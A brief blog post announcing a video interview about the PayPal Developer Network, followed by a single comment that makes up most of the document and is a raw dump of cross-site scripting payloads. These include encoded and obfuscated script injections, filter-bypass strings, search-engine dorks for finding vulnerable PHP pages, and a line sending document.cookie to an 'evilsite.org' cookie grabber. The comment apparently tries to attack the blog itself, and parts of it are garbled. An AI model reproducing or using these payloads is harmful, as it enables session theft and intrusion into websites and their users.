sfbeta On Air Interview: Inside the PayPal Developer Network


On July 1st, I joined Christian Perry of sfbeta on air to talk about PayPal | Developer and what we are trying to accomplish at the company. We get into why I joined the company, what I think we are trying to change with our efforts, and even go into how to stop world hunger, so there’s plenty of topic diversity for everyone.

Without going into too much detail, here’s our video interview:

3 thoughts on “sfbeta On Air Interview: Inside the PayPal Developer Network”

  1. Narendra Bhati

    “>Pwned+by+Max+Govanni
    “>
    “>
    ?debugMode=1&dataURL=’>Click Me For XSS
    %22%3Cmarquee%3E%3Cimg%20src=k%20onerror=alert(%22PWNED%22)%20/
    %3E

    ‘>Click Me For XSS

    <B alert(1)>

    <B="alert(1)”>

    alert(1)

    alert(1)”(EOF)

    : alert(1)”>

    ({0:#0= alert /#0#/#0#(1)});

    2) (1.. __proto__ . e0 = alert )(1. e0 );

    3) a=a setter = alert ;

    4) _ =[[ $ ,__ ,,$$ ,,_$ ,$_ , _$_ ,,, $_$ ]=! ‘ ‘+[!{}]+

    inurl:”.php?cmd=”
    inurl:”.php?z=”

    inurl:”.php?q=”
    inurl:”.php?search=”
    inurl:”.php?query=”
    inurl:”.php?searchstring=”
    inurl:”.php?keyword=”
    inurl:”.php?file=”
    inurl:”.php?years=”
    inurl:”.php?txt=”
    inurl:”.php?tag=”
    inurl:”.php?max=”
    inurl:”.php?from=”
    inurl:”.php?author=”
    inurl:”.php?pass=”
    inurl:”.php?feedback=”
    inurl:”.php?mail=”
    inurl:”.php?cat=”
    inurl:”.php?vote=”
    inurl:search.php?q=
    inurl:com_feedpostold/feedpost.php?url=
    inurl:scrapbook.php?id=
    inurl:headersearch.php?sid=
    inurl:/poll/default.asp?catid=
    inurl:/search_results.php?search=

    PHNjcmlwdD5hbGVydCgnWFNTZWQgQnkgSW5qZWN0T3IgYW5kIEFwM3gnKTwvc2NyaXB0Pg%3D%3D
    Some Attack html & java Strings:
    ==========================
    XSSed By Bluff Master Hacker
    alert(“Hacked”)

    XSSed%20By%20%20lonelyr%20Hacker

    URL Encoded Strings using character codes to Bypass
    ==========================

    Some Java Disaster Strings
    ==========================
    nd_mode=”meteor”;nd_dest=”massive”;nd_control=”on”;nd_vAlign=”bottom”;nd_hAlign=”right”;nd_vMargin=”10″;nd_hMargin=”10″;nd_target=”_top”;

    nd_mode=”cow”;nd_vAlign=”bottom”;nd_hAlign=”right”;nd_vMargin=”10<s”;nd_hMargin=”10?;nd_target=”_top”;

    %3Cscript%20language=%94javascript%94%20src=%94http://www.netdisaster.com/js/mynd.js%94%3E%3C/script%3E

    Any of your Image link
    ==========================

    http://go4webapps.com/wp-content/uploads…utton1.jpg

    <IMG SRC=”javascript:alert(1);”>

    onmouseover=alert(1);

    ¼script¾alert(¢XSS¢)¼/script¾

    BODY{background:url(“javascript:alert(‘XSS’)”)}
    %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3eJavascript
    .XSS{background-image:url(“javascript:alert(‘XSS’)”);}
    alert(‘XSS’);
    data:text/html,test
    exp/*
    <META HTTP-EQUIV="Link" Content="; REL=stylesheet”>
    data:text/html;base64,dGVzdA==
    document.write(atob(/dGVzdA==/.source));
    document.write(/test/.source);
    document.write(String.fromCharCode(116,101,115,116,11));
    document.write(“x74x65x73x74x0A”);
    <LINK REL=”stylesheet” HREF=”http://ha.ckers.org/xss.css”>

    <DIV STYLE="background-image:07507206C028'06a06107606107306307206907007403a06106c065072074028.1027058.1053053027029'029"
    string.fromCharCode(60, 115, 99, 114, 105, 112, 116, 32, 116, 121, 112, 101, 61, 118, 98, 115, 99, 114, 105, 112, 116, 62, 77, 115, 103, 66, 111, 120, 40, 48, 41, 60, 47, 115, 99, 114, 105, 112, 116, 62, 13, 10, 13, 10, 39, 39, 59, 33, 45, 45, 34, 60, 88, 83, 83, 62, 61, 38, 123, 40, 41, 125, 13, 10, 13, 10, 39, 62, 47, 47, 92, 92, 44, 60, 39, 62, 34, 62, 34, 62, 34, 42, 34, 13, 10)
    %3C%73%63%72%69%70%74%20%74%79%70%65%3D%76%62%73%63%72%69%70%74%3E%4D%73%67%42%6F%78%28%30%29%3C%2F%73%63%72%69%70%74%3E%0D%0A%0D%0A%27%27%3B%21%2D%2D%22%3C%58%53%53%3E%3D%26%7B%28%29%7D%0D%0A%0D%0A%27%3E%2F%2F%5C%5C%2C%3C%27%3E%22%3E%22%3E%22%2A%22%0D%0A

    <script type=vbscript>MsgBox(0)</script> '';!--"<XSS>=&{()} '>//\\,<'>">">"*"

    &#60&#115&#99&#114&#105&#112&#116&#32&#116&#121&#112&#101&#61&#118&#98&#115&#99&#114&#105&#112&#116&#62&#77&#115&#103&#66&#111&#120&#40&#48&#41&#60&#47&#115&#99&#114&#105&#112&#116&#62&#13&#10&#13&#10&#39&#39&#59&#33&#45&#45&#34&#60&#88&#83&#83&#62&#61&#38&#123&#40&#41&#125&#13&#10&#13&#10&#39&#62&#47&#47&#92&#92&#44&#60&#39&#62&#34&#62&#34&#62&#34&#42&#34&#13&#10

    a=”get”;
    b=”URL(“”;
    c=”javascript:”;
    d=”alert(‘XSS’);”)”;
    eval(a+b+c+d)
    PHNjcmlwdCB0eXBlPXZic2NyaXB0Pk1zZ0JveCgwKTwvc2NyaXB0Pg0KDQonJzshLS0iPFhTUz49JnsoKX0NCg0KJz4vL1xcLDwnPiI+Ij4iKiINCg==

    <IMG SRC="javascript:alert(‘XSS’)”>

    Code:
    MsgBox(0)

    <t:set attributeName="innerHTML" to="XSSalert(“XSS”)”>

    ”;!–“=’>//,”>”>”*”

    ‘); alert(‘XSS

    alert(1);

    alert(‘XSS’);

    alert(“XSS”)”>
    alert%28String.fromCharCode(84%2C72%2C73%2C83%2C32%2C83%2C73%2C84%2C?69%2C32%2C73%2C83%2C32%2C72%2C65%2C67%2C75%2C69%2C68%2C32%2C66%2C89%2C32%2C66%2C?76%2C85%2C70%2C70%2C32%2C77%2C65%2C83%2C84%2C69%2C82%2C32%2C72%2C65%2C67%2C75%2C?69%2C82%29%29;%2C89%2C32%2C66%2C?76%2C85%2C70%2C70%2C32%2C77%2C65%2C83%2C84%2C69%2C82%2C32%2C72%2C65%2C67%2C75%2C?69%2C82%29%29;

    %3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%2

    prompt(0)

    data:application/msword;base64,0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAAPgADAP7

    /…………

    document.write(“x74x65x73x74x0A”);

    %3CIMG+DYNSRC%3D%5C%22javascript%3Aalert%28%27XSS%27%29%5C%22%3E++%3Cfont+style%3D%27color%3Aexpression%28alert%28document.cookie%29%29%27%3E++%3Cimg+src%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E++%3Cscript+language%3D%22JavaScript%22%3Ealert%28%27XSS%27%29%3C%2Fscript%3E++%3Cbody+onunload%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E++%3Cbody+onLoad%3D%22alert%28%27XSS%27%29%3B%22++%5Bcolor%3Dred%27+onmouseover%3D%22alert%28%27xss%27%29%22%5Dmouse+over%5B%2Fcolor%5D++%22%2F%3E%3C%2Fa%3E%3C%2F%3E%3Cimg+src%3D1.gif+onerror%3Dalert%281%29%3E++window.alert%28%22Bonjour+%21%22%29%3B++%3Cdiv+style%3D%22x%3Aexpression%28%28window.r%3D%3D1%29%3F%27%27%3Aeval%28%27r%3D1%3B++alert%28String.fromCharCode%2888%2C83%2C83%29%29%3B%27%29%29%22%3E++%3Ciframe%3C%3Fphp+echo+chr%2811%29%3F%3E+onload%3Dalert%28%27XSS%27%29%3E%3C%2Fiframe%3E++%22%3E%3Cscript+alert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E++%27%3E%3E%3Cmarquee%3E%3Ch1%3EXSS%3C%2Fh1%3E%3C%2Fmarquee%3E++%27%22%3E%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E++%27%22%3E%3E%3Cmarquee%3E%3Ch1%3EXSS%3C%2Fh1%3E%3C%2Fmarquee%3E++%3CMETA+HTTP-EQUIV%3D%5C%22refresh%5C%22+CONTENT%3D%5C%220%3Burl%3Djavascript%3Aalert%28%27XSS%27%29%3B%5C%22%3E++%3CMETA+HTTP-EQUIV%3D%5C%22refresh%5C%22+CONTENT%3D%5C%220%3B+URL%3Dhttp%3A%2F%2F%3BURL%3Djavascript%3Aalert%28%27XSS%27%29%3B%5C%22%3E++%3Cscript%3Evar+var+%3D+1%3B+alert%28var%29%3C%2Fscript%3E++%3CSTYLE+type%3D%22text%2Fcss%22%3EBODY%7Bbackground%3Aurl%28%22javascript%3Aalert%28%27XSS%27%29%22%29%7D%3C%2FSTYLE%3E++%3C%3F%3D%27%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%3F%3E++%3CIMG+SRC%3D%27vbscript%3Amsgbox%28%5C%22XSS%5C%22%29%27%3E++%22+onfocus%3Dalert%28document.domain%29+%22%3E+%3C%22++%3CFRAMESET%3E%3CFRAME+SRC%3D%5C%22javascript%3Aalert%28%27XSS%27%29%3B%5C%22%3E%3C%2FFRAMESET%3E++%3CSTYLE%3Eli+%7Blist-style-image%3A+url%28%5C%22javascript%3Aalert%28%27XSS%27%29%5C%22%29%3B%7D%3C%2FSTYLE%3E%3CUL%3E%3CLI%3EXSS++perl+-e+%27print+%5C%22%3CSCR%5C0IPT
%3Ealert%28%5C%22XSS%5C%22%29%3C%2FSCR%5C0IPT%3E%5C%22%3B%27+%3E+out++perl+-e+%27print+%5C%22%3CIMG+SRC%3Djava%5C0script%3Aalert%28%5C%22XSS%5C%22%29%3E%5C%22%3B%27+%3E+out++%3Cbr+size%3D%5C%22%26%7Balert%28%27XSS%27%29%7D%5C%22%3E++%3Cscrscriptipt%3Ealert%281%29%3C%2Fscrscriptipt%3E++%3C%2Fbr+style%3Da%3Aexpression%28alert%28%29%29%3E++%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E++%22%3E%3CBODY+onload%21%23%24%25%26%28%29*%7E%2B-_.%2C%3A%3B%3F%40%5B%2F%7C%5C%5D%5E%60%3Dalert%28%22XSS%22%29%3E++%5Bcolor%3Dred+width%3Dexpression%28alert%28123%29%29%5D%5Bcolor%5D++%3CBASE+HREF%3D%22javascript%3Aalert%28%27XSS%27%29%3B%2F%2F%22%3E++Execute%28MsgBox%28chr%2888%29%26chr%2883%29%26chr%2883%29%29%29%3C++%22%3E%3C%2Fiframe%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E++%3Cbody+onLoad%3D%22while%28true%29+alert%28%27XSS%27%29%3B%22%3E++%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281111%29%3C%2Fscript%3E++%3C%2Ftextarea%3E%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E++%27%22%22%3E%3Cscript+language%3D%22JavaScript%22%3E+alert%28%27X+%5CnS+%5CnS%27%29%3B%3C%2Fscript%3E++%3C%2Fscript%3E%3C%2Fscript%3E%3C%3C%3C%3Cscript%3E%3C%3E%3E%3E%3E%3C%3C%3Cscript%3Ealert%28123%29%3C%2Fscript%3E++%3Chtml%3E%3Cnoalert%3E%3Cnoscript%3E%28123%29%3C%2Fnoscript%3E%3Cscript%3E%28123%29%3C%2Fscript%3E++%3CINPUT+TYPE%3D%22IMAGE%22+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E++%27%3E%3C%2Fselect%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E++%27%3E%22%3E%3Cscript+src+%3D+%27http%3A%2F%2Fwww.site.com%2FXSS.js%27%3E%3C%2Fscript%3E++%7D%3C%2Fstyle%3E%3Cscript%3Ea%3Deval%3Bb%3Dalert%3Ba%28b%28%2FXSS%2F.source%29%29%3B%3C%2Fscript%3E++%3CSCRIPT%3Edocument.write%28%22XSS%22%29%3B%3C%2FSCRIPT%3E++a%3D%22get%22%3Bb%3D%22URL%22%3Bc%3D%22javascript%3A%22%3Bd%3D%22alert%28%27xss%27%29%3B%22%3Beval%28a%2Bb%2Bc%2Bd%29%3B++%3D%27%3E%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E++%3Cscript%2Bsrc%3D%22%3E%22%2Bsrc%3D%22http%3A%2F%2Fyoursite.com%2Fxss.js%3F69%252C69%22%3E%3C%2Fscript%3E++
%3Cbody+background%3Djavascript%3A%27%22%3E%3Cscript%3Ealert%28navigator.userAgent%29%3C%2Fscript%3E%3E%3C%2Fbody%3E++%22%3E%2FXaDoS%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cscript+src%3D%22http%3A%2F%2Fwww.site.com%2FXSS.js%22%3E%3C%2Fscript%3E++%22%3E%2FKinG-InFeT.NeT%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E++src%3D%22http%3A%2F%2Fwww.site.com%2FXSS.js%22%3E%3C%2Fscript%3E++data%3Atext%2Fhtml%3Bcharset%3Dutf-7%3Bbase64%2CIj48L3RpdGxlPjxzY3JpcHQ%2BYWxlcnQoMTMzNyk8L3NjcmlwdD4%3D++%21–%22+%2F%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E++%3Cscript%3Ealert%28%22XSS+by+%5Cnxss%22%29%3C%2Fscript%3E%3Cmarquee%3E%3Ch1%3EXSS+by+xss%3C%2Fh1%3E%3C%2Fmarquee%3E++%22%3E%3Cscript%3Ealert%28%22XSS+by+%5Cnxss%22%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+xss%3C%2Fh1%3E%3C%2Fmarquee%3E++%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%28%22XSS+by+%5Cnxss%22%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+xss%3C%2Fh1%3E%3C%2Fmarquee%3E++%3Cimg+%22%22%22%3E%3Cscript%3Ealert%28%22XSS+by+%5Cnxss%22%29%3C%2Fscript%3E%3Cmarquee%3E%3Ch1%3EXSS+by+xss%3C%2Fh1%3E%3C%2Fmarquee%3E++%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3Cmarquee%3E%3Ch1%3EXSS+by+xss%3C%2Fh1%3E%3C%2Fmarquee%3E++%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%22XSS+by+%5Cnxss%3C%2Fh1%3E%3C%2Fmarquee%3E++%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+xss%3C%2Fh1%3E%3C%2Fmarquee%3E++%3Ciframe+src%3D%22javascript%3Aalert%28%27XSS+by+%5Cnxss%27%29%3B%22%3E%3C%2Fiframe%3E%3Cmarquee%3E%3Ch1%3EXSS+by+xss%3C%2Fh1%3E%3C%2Fmarquee%3E

    location.href=”http://www.evilsite.org/cookiegrabber.php?cookie”+escape(document.cookie)

    <script>alert(‘XSS’);</script>

    alert(String.fromCharCode(88,83,83))

    @import’javascript:alert(“XSS”)’;

    <? echo('alert(“XSS”)’); ?>

    alert(‘XSS’)

    “>alert(0)

    alert(/xss/)

    alert(/xss/)

    alert(‘XSS’)

    window.alert(“Bonjour !”);

    <iframe onload=alert(‘XSS’)>

    “><script alert(String.fromCharCode(88,83,83))

    ‘>>XSS

    ‘”>>alert(‘XSS’)

    ‘”>>XSS

    var var = 1; alert(var)

    BODY{background:url(“javascript:alert(‘XSS’)”)}

    <?='alert(“XSS”)’?>

    ” onfocus=alert(document.domain) “> <"

    li {list-style-image: url(“javascript:alert(‘XSS’)”);}XSS

    perl -e ‘print “alert(“XSS”)”;’ > out

    perl -e ‘print “”;’ > out

    alert(1)

    alert(1)

    “>

    [color=red width=expression(alert(123))][color]

    Execute(MsgBox(chr(88)&chr(83)&chr(83)))alert(123)

    ‘”>alert(1111)

    ‘”>alert(document.cookie)

    ‘””> alert(‘X nS nS’);

    <<<>>><<alert(123)

    (123)(123)

    ‘>alert(123)

    ‘>”>

    }a=eval;b=alert;a(b(/XSS/.source));

    document.write(“XSS”);

    a=”get”;b=”URL”;c=”javascript:”;d=”alert(‘xss’);”;eval(a+b+c+d);

    =’>alert(“xss”)

    “+src=”http://yoursite.com/xss.js?69%2C69”>

    alert(navigator.userAgent)>

    “>/XaDoS/>alert(document.cookie)

    “>/KinG-InFeT.NeT/>alert(document.cookie)

    src=”http://www.site.com/XSS.js”>

    data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=

    !–” />alert(‘xss’);

    alert(“XSS by bhati”)XSS by bhati

    “>alert(“XSS by nxss”)>XSS by bhati

    ‘”>alert(“XSS by nbhati”)>XSS by xss

    alert(“XSS by nxss”)XSS by bhati

    alert(1337)XSS by xss

    “>alert(1337)”>alert(“XSS by nxss

    ‘”>alert(1337)>XSS by xss

    XSS by xss
